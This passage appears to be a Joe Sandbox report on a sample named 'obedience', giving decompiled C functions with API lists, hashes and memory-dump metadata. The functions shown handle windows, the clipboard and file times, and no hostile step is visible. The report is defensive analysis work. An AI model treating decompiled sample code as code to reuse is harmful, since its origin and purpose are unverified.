      										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
      										if( *((char*)(_t131 + 0x22f)) != 2) {
      											_t133 =  *(_v8 + 0x220);
      											__eflags = _t133;
      											if(_t133 != 0) {
      												__eflags = _t133 - _v8;
      												if(_t133 != _v8) {
      													_t255 = E0044B158(_t133);
      												}
      											}
      										} else {
      											_t136 = E0045E4AC(_v8);
      											__eflags = _t136;
      											if(_t136 != 0) {
      												_t255 = E0044B158(E0045E4AC(_v8));
      											}
      										}
      										__eflags = _t255;
      										if(_t255 == 0) {
      											goto L43;
      										} else {
      											_t92 = SetFocus(_t255);
      										}
      									}
      								}
      							}
      							goto L44;
      						} else {
      							_t231 = _t230 - 0x22;
      							if(_t231 == 0) {
      								_v24 = __edx[2];
      								__eflags = _v24->i - 1;
      								if(_v24->i != 1) {
      									goto L43;
      								} else {
      									_t142 = _v8;
      									__eflags =  *(_t142 + 0x248);
      									if( *(_t142 + 0x248) == 0) {
      										goto L43;
      									} else {
      										_t249 = E00457BFC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
      										__eflags = _t249;
      										if(_t249 == 0) {
      											goto L43;
      										} else {
      											_v16 = E00426448(0, 1);
      											_push(_t258);
      											_push(0x45ddf9);
      											_push( *[fs:eax]);
      											 *[fs:eax] = _t261;
      											_v12 = SaveDC( *(_v24 + 0x18));
      											_push(_t258);
      											_push(0x45dddc);
      											_push( *[fs:eax]);
      											 *[fs:eax] = _t261;
      											E00426B80(_v16,  *(_v24 + 0x18));
      											E00426A20(_v16);
      											E00459114(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
      											_pop(_t237);
      											 *[fs:eax] = _t237;
      											_push(0x45dde3);
      											__eflags = 0;
      											E00426B80(_v16, 0);
      											return RestoreDC( *(_v24 + 0x18), _v12);
      										}
      									}
      								}
      							} else {
      								if(_t231 == 1) {
      									_t256 = __edx[2];
      									__eflags = _t256->i - 1;
      									if(_t256->i != 1) {
      										goto L43;
      									} else {
      										_t172 = _v8;
      										__eflags =  *(_t172 + 0x248);
      										if( *(_t172 + 0x248) == 0) {
      											goto L43;
      										} else {
      											_t250 = E00457BFC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
      											__eflags = _t250;
      											if(_t250 == 0) {
      												goto L43;
      											} else {
      												_t177 = E0044B158(_v8);
      												L00407768();
      												_v20 = _t177;
      												 *[fs:eax] = _t261;
      												_v16 = E00426448(0, 1);
      												 *[fs:eax] = _t261;
      												_v12 = SaveDC(_v20);
      												 *[fs:eax] = _t261;
      												E00426B80(_v16, _v20);
      												E00426A20(_v16);
      												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x45dee3, _t258,  *[fs:eax], 0x45df00, _t258,  *[fs:eax], 0x45df27, _t258, _t177);
      												_pop(_t245);
      												 *[fs:eax] = _t245;
      												_push(0x45deea);
      												__eflags = 0;
      												E00426B80(_v16, 0);
      												return RestoreDC(_v20, _v12);
      											}
      										}
      									}
      								} else {
      									L41:
      									_t267 = _t92 -  *0x490b88; // 0xc089
      									if(_t267 == 0) {
      										E00445AE8(_v8, 0, 0xb025, 0);
      										E00445AE8(_v8, 0, 0xb024, 0);
      										E00445AE8(_v8, 0, 0xb035, 0);
      										E00445AE8(_v8, 0, 0xb009, 0);
      										E00445AE8(_v8, 0, 0xb008, 0);
      										E00445AE8(_v8, 0, 0xb03d, 0);
      									}
      									L43:
      									_t92 = E00448B44(_v8, _t200);
      									L44:
      									return _t92;
      								}
      							}
      						}
      					}
      				}
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: RestoreSave$B080Focus
      • String ID:
      • API String ID: 809140284-0
      • Opcode ID: a87bd35593b718b27a4310cd315fc2e46a330e0b1320dfec8607c338046f0d76
      • Instruction ID: 7b91dcdbca48a2c96d6c23b89de624c5751d44b1714c560a1ce24be4cba5d013
      • Opcode Fuzzy Hash: a87bd35593b718b27a4310cd315fc2e46a330e0b1320dfec8607c338046f0d76
      • Instruction Fuzzy Hash: C4B18135E001049FDB21DF69C886AAEB7F5EF09309F2544A6F801E7366C738AE44CB58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 38%
      			E00463FFC(void* __eax) {
      				struct HWND__* _t21;
      				intOrPtr* _t26;
      				signed int _t29;
      				intOrPtr* _t30;
      				int _t33;
      				intOrPtr _t36;
      				void* _t51;
      				int _t60;
      
      				_t51 = __eax;
      				_t21 = IsIconic( *(__eax + 0x30));
      				if(_t21 != 0) {
      					SetActiveWindow( *(_t51 + 0x30));
      					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
      						L6:
      						E00462F54( *(_t51 + 0x30), 9, __eflags);
      					} else {
      						_t60 = IsWindowEnabled(E0044B158( *((intOrPtr*)(_t51 + 0x44))));
      						if(_t60 == 0) {
      							goto L6;
      						} else {
      							_push(0);
      							_push(0xf120);
      							_push(0x112);
      							_push( *(_t51 + 0x30));
      							L00407550();
      						}
      					}
      					_t26 =  *0x48f6b0; // 0x490904
      					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
      					if(_t60 < 0) {
      						asm("adc eax, 0x0");
      					}
      					_t30 =  *0x48f6b0; // 0x490904
      					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
      					if(_t60 < 0) {
      						asm("adc eax, 0x0");
      					}
      					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
      					_t36 =  *((intOrPtr*)(_t51 + 0x44));
      					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
      						E0045EB54(_t36, 0);
      						E00460F78( *((intOrPtr*)(_t51 + 0x44)));
      					}
      					E00463648(_t51);
      					_t21 =  *0x490b80; // 0x2480e74
      					_t15 = _t21 + 0x64; // 0x0
      					_t55 =  *_t15;
      					if( *_t15 != 0) {
      						_t21 = SetFocus(E0044B158(_t55));
      					}
      					if( *((short*)(_t51 + 0x122)) != 0) {
      						return  *((intOrPtr*)(_t51 + 0x120))();
      					}
      				}
      				return _t21;
      			}

      APIs
      • IsIconic.USER32 ref: 00464004
      • SetActiveWindow.USER32(?,?,?,?,00463A29,00000000,00463EE7), ref: 00464015
      • IsWindowEnabled.USER32(00000000), ref: 00464038
      • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00463A29,00000000,00463EE7), ref: 00464051
      • SetWindowPos.USER32(?,00000000,00000000,?,?,00463A29,00000000,00463EE7), ref: 00464097
      • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00463A29,00000000,00463EE7), ref: 004640DC
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
      • String ID:
      • API String ID: 3996302123-0
      • Opcode ID: 464bc6d1d06e961608d28c771647fdcae81ea12c68045d2a4d84896d5cded9f2
      • Instruction ID: 5e9e04771ccc4d2063fef2887d9cf379e5564c0b831c913b56619a8eb5323e83
      • Opcode Fuzzy Hash: 464bc6d1d06e961608d28c771647fdcae81ea12c68045d2a4d84896d5cded9f2
      • Instruction Fuzzy Hash: A0312F71B04250ABEF24AE69CD85B5A3798AB45704F08047AFF00EF2D7E67DEC44871A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 46%
      			E0043D32C(void* __ebx, char __edx, void* __edi, void* __esi) {
      				char _v8;
      				void* _v12;
      				void* _v16;
      				void* _t28;
      				void* _t34;
      				intOrPtr _t43;
      				void* _t46;
      				intOrPtr _t51;
      				intOrPtr _t53;
      				void* _t57;
      				void* _t58;
      				intOrPtr _t59;
      
      				_t57 = _t58;
      				_t59 = _t58 + 0xfffffff4;
      				_v8 = __edx;
      				E00404EF0(_v8);
      				_push(_t57);
      				_push(0x43d45c);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t59;
      				if(OpenClipboard(0) == 0) {
      					_t43 =  *0x48f5ac; // 0x423d10
      					E0040CCA8(_t43, 1);
      					E004043D0();
      					_pop(_t51);
      					 *[fs:eax] = _t51;
      					_push(0x43d463);
      					return E00404A40( &_v8);
      				} else {
      					_push(_t57);
      					_push(0x43d428);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t59;
      					_v12 = GlobalAlloc(0x2002, E00404D00(_v8) + 1);
      					_push(_t57);
      					_push(0x43d3fd);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t59;
      					_t28 = _v12;
      					GlobalFix(_t28);
      					_v16 = _t28;
      					_push(_t57);
      					_push(0x43d3ec);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t59;
      					_push(E00404D00(_v8) + 1);
      					_t34 = E00404F00(_v8);
      					_pop(_t46);
      					E00402CEC(_t34, _t46, _v16);
      					EmptyClipboard();
      					SetClipboardData(1, _v12);
      					_pop(_t53);
      					 *[fs:eax] = _t53;
      					_push(0x43d3f3);
      					return GlobalUnWire(_v12);
      				}
      			}

      APIs
      • OpenClipboard.USER32(00000000), ref: 0043D350
      • GlobalAlloc.KERNEL32(00002002,00000001,00000000,0043D428,?,00000000,0043D45C), ref: 0043D37A
      • GlobalFix.KERNEL32 ref: 0043D394
      • EmptyClipboard.USER32(00000000,0043D3EC,?,?,00000000,0043D3FD,?,00002002,00000001,00000000,0043D428,?,00000000,0043D45C), ref: 0043D3C5
      • SetClipboardData.USER32 ref: 0043D3D0
      • GlobalUnWire.KERNEL32(?), ref: 0043D3E6
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ClipboardGlobal$AllocDataEmptyOpenWire
      • String ID:
      • API String ID: 461592451-0
      • Opcode ID: a97772e44d22911fa3e36d06db9823f5579b9a6dbf3cc6d966f35112a804da02
      • Instruction ID: e63834b7d479ea035c040ee78233693d7f82344d75b3de6e7f2546991df4e9b1
      • Opcode Fuzzy Hash: a97772e44d22911fa3e36d06db9823f5579b9a6dbf3cc6d966f35112a804da02
      • Instruction Fuzzy Hash: 5E218370A04204BFD701EF66EC52D6EBBACEB49704F51447AF900E36D1D639AD10D969
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 85%
      			E0044AB44(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
      				void* _v20;
      				struct _WINDOWPLACEMENT _v48;
      				char _v64;
      				void* _t31;
      				int _t45;
      				int _t51;
      				void* _t52;
      				int _t56;
      				int _t58;
      
      				_t56 = __ecx;
      				_t58 = __edx;
      				_t52 = __eax;
      				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
      					L4:
      					if(E0044B45C(_t52) == 0) {
      						L7:
      						 *(_t52 + 0x40) = _t58;
      						 *(_t52 + 0x44) = _t56;
      						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
      						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
      						_t31 = E0044B45C(_t52);
      						__eflags = _t31;
      						if(_t31 != 0) {
      							_v48.length = 0x2c;
      							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
      							E004442C8(_t52,  &_v64);
      							asm("movsd");
      							asm("movsd");
      							asm("movsd");
      							asm("movsd");
      							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
      						}
      						L9:
      						E00443F7C(_t52);
      						return E00403DF8(_t52, _t66);
      					}
      					_t45 = IsIconic( *(_t52 + 0x180));
      					_t66 = _t45;
      					if(_t45 != 0) {
      						goto L7;
      					}
      					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
      					goto L9;
      				} else {
      					_t51 = _a4;
      					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
      						return _t51;
      					}
      					goto L4;
      				}
      			}

      APIs
      • IsIconic.USER32 ref: 0044AB83
      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044ABA1
      • GetWindowPlacement.USER32(?,0000002C), ref: 0044ABD7
      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0044ABFB
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Placement$Iconic
      • String ID: ,
      • API String ID: 568898626-3772416878
      • Opcode ID: e494ebc5bb2c508008432f3f3ac19aad58117c86fa7887328a91d2b2279d1e61
      • Instruction ID: 7cdf8aaac00e2129449384dfe2acbf317d57f5134c70caf019597a77b667cf10
      • Opcode Fuzzy Hash: e494ebc5bb2c508008432f3f3ac19aad58117c86fa7887328a91d2b2279d1e61
      • Instruction Fuzzy Hash: 84216271A00104ABDF54EFADC8C599A77A9EF08354F04846AFE04EF346D779ED048BA5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 72%
      			E00463F4C(void* __eax) {
      				struct HWND__* _t21;
      				void* _t40;
      
      				_t40 = __eax;
      				_t21 = IsIconic( *(__eax + 0x30));
      				if(_t21 == 0) {
      					E00463638();
      					SetActiveWindow( *(_t40 + 0x30));
      					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0044B158( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
      						_t21 = E00462F54( *(_t40 + 0x30), 6, __eflags);
      					} else {
      						_t43 =  *((intOrPtr*)(_t40 + 0x44));
      						SetWindowPos( *(_t40 + 0x30), E0044B158( *((intOrPtr*)(_t40 + 0x44))),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
      						_push(0);
      						_push(0xf020);
      						_push(0x112);
      						_t21 =  *(_t40 + 0x30);
      						_push(_t21);
      						L00407550();
      					}
      					if( *((short*)(_t40 + 0x11a)) != 0) {
      						return  *((intOrPtr*)(_t40 + 0x118))();
      					}
      				}
      				return _t21;
      			}

      APIs
      • IsIconic.USER32 ref: 00463F54
      • SetActiveWindow.USER32(?,?,?,00490B7C,004646B0), ref: 00463F6C
      • IsWindowEnabled.USER32(00000000), ref: 00463F8F
      • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,00490B7C,004646B0), ref: 00463FB8
      • NtdllDefWindowProc_A.USER32(?,00000112,0000F020,00000000,?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,00490B7C), ref: 00463FCD
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$ActiveEnabledIconicNtdllProc_
      • String ID:
      • API String ID: 1720852555-0
      • Opcode ID: 9580dc9ab7ea42ae1e013a5f52101e197ea619e460490188a7263d1fc1943d5f
      • Instruction ID: 2251ec4f72312f945e9ede35c8d4992597ec7f58a7929770e07453b568f242b9
      • Opcode Fuzzy Hash: 9580dc9ab7ea42ae1e013a5f52101e197ea619e460490188a7263d1fc1943d5f
      • Instruction Fuzzy Hash: CD11F171A04240ABDB58EF6DC98AB9637A8AF04305F04046ABB04DB287E679EC44875A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 79%
      			E0042D738(struct HWND__* _a4, signed int _a8) {
      				struct _WINDOWPLACEMENT _v48;
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				signed int _t19;
      				intOrPtr _t21;
      				struct HWND__* _t22;
      
      				_t19 = _a8;
      				_t22 = _a4;
      				if( *0x49092d != 0) {
      					if((_t19 & 0x00000003) == 0) {
      						if(IsIconic(_t22) == 0) {
      							GetWindowRect(_t22,  &(_v48.rcNormalPosition));
      						} else {
      							GetWindowPlacement(_t22,  &_v48);
      						}
      						return E0042D6A8( &(_v48.rcNormalPosition), _t19);
      					}
      					return 0x12340042;
      				}
      				_t21 =  *0x490908; // 0x42d738
      				 *0x490908 = E0042D52C(1, _t19, "MonitorFromWindow", _t21, _t22);
      				return  *0x490908(_t22, _t19);
      			}

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressProc
      • String ID: MonitorFromWindow
      • API String ID: 190572456-2842599566
      • Opcode ID: 5715bf3131fcaa5dd9bcea958775c986e0957f7b0af7cd74459e7291f9f5f307
      • Instruction ID: d12581fe6b9e84d9641c87f21ad367f450782f1497440c250546adf2207ba739
      • Opcode Fuzzy Hash: 5715bf3131fcaa5dd9bcea958775c986e0957f7b0af7cd74459e7291f9f5f307
      • Instruction Fuzzy Hash: E701ADB6F061286E9700AB64EC819FB736CDB54354B90413BF85093242DB3CAD0187AE
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 58%
      			E0043EDE4(void* __eax, void* __ebx, void* __edi, void* __esi) {
      				char _v8;
      				CHAR* _t20;
      				long _t25;
      				intOrPtr _t30;
      				void* _t34;
      				intOrPtr _t37;
      
      				_push(0);
      				_t34 = __eax;
      				_push(_t37);
      				_push(0x43ee61);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t37;
      				E0043E844(__eax);
      				_t25 = GetTickCount();
      				do {
      					Sleep(0);
      				} while (GetTickCount() - _t25 <= 0x3e8);
      				E0043E444(_t34, _t25,  &_v8, 0, __edi, _t34);
      				if(_v8 != 0) {
      					_t20 = E00404F00(_v8);
      					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
      				}
      				_pop(_t30);
      				 *[fs:eax] = _t30;
      				_push(0x43ee68);
      				return E00404A40( &_v8);
      			}

      APIs
        • Part of subcall function 0043E844: WinHelpA.USER32 ref: 0043E853
      • GetTickCount.KERNEL32 ref: 0043EE02
      • Sleep.KERNEL32(00000000,00000000,0043EE61,?,?,00000000,00000000,?,0043EDDA), ref: 0043EE0B
      • GetTickCount.KERNEL32 ref: 0043EE10
      • WinHelpA.USER32 ref: 0043EE46
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CountHelpTick$Sleep
      • String ID:
      • API String ID: 2438605093-0
      • Opcode ID: 8e33e0e4cc27ad011a781805fef770ae864b6f6a959dbf9318e14417f39d9839
      • Instruction ID: 3059649e566d64dcbcfeed69baad9d8d9e1fa4fa0e41bc41da56395f2e87d1aa
      • Opcode Fuzzy Hash: 8e33e0e4cc27ad011a781805fef770ae864b6f6a959dbf9318e14417f39d9839
      • Instruction Fuzzy Hash: 90016230B04204AFE711EB67DC53B5E72A8DB8D704F61447BF500E76D2DA786E0089AE
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00409798(void* __eax) {
      				short _v6;
      				short _v8;
      				struct _FILETIME _v16;
      				struct _WIN32_FIND_DATAA _v336;
      				void* _t16;
      
      				_t16 = FindFirstFileA(E00404F00(__eax),  &_v336);
      				if(_t16 == 0xffffffff) {
      					L3:
      					_v8 = 0xffffffff;
      				} else {
      					FindClose(_t16);
      					if((_v336.dwFileAttributes & 0x00000010) != 0) {
      						goto L3;
      					} else {
      						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
      						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
      							goto L3;
      						}
      					}
      				}
      				return _v8;
      			}

      0x004097b3
      0x004097bb
      0x004097f1
      0x004097f1
      0x004097bd
      0x004097be
      0x004097ca
      0x00000000
      0x004097cc
      0x004097d7
      0x004097ef
      0x00000000
      0x00000000
      0x004097ef
      0x004097ca
      0x004097ff

      APIs
      • FindFirstFileA.KERNEL32(00000000,?), ref: 004097B3
      • FindClose.KERNEL32(00000000,00000000,?), ref: 004097BE
      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004097D7
      • FileTimeToDosDateTime.KERNEL32 ref: 004097E8
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileTime$Find$CloseDateFirstLocal
      • String ID:
      • API String ID: 2659516521-0
      • Opcode ID: 869761e129e18ed7858d7ffabd136295bab75db844683330128e23767959f97d
      • Instruction ID: 811e8bcf15501fb0351e252b621e0f16fa8c16e5037b0c5b3c8ff01e1ed7727f
      • Opcode Fuzzy Hash: 869761e129e18ed7858d7ffabd136295bab75db844683330128e23767959f97d
      • Instruction Fuzzy Hash: 77F0F472D0420CA6CB11DEA58C85ACF73AC5B05324F5007B7B525F31D1EA389B445795
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E00448B44(void* __eax, intOrPtr* __edx) {
      				char _v20;
      				char _v28;
      				intOrPtr _t17;
      				void* _t19;
      				void* _t21;
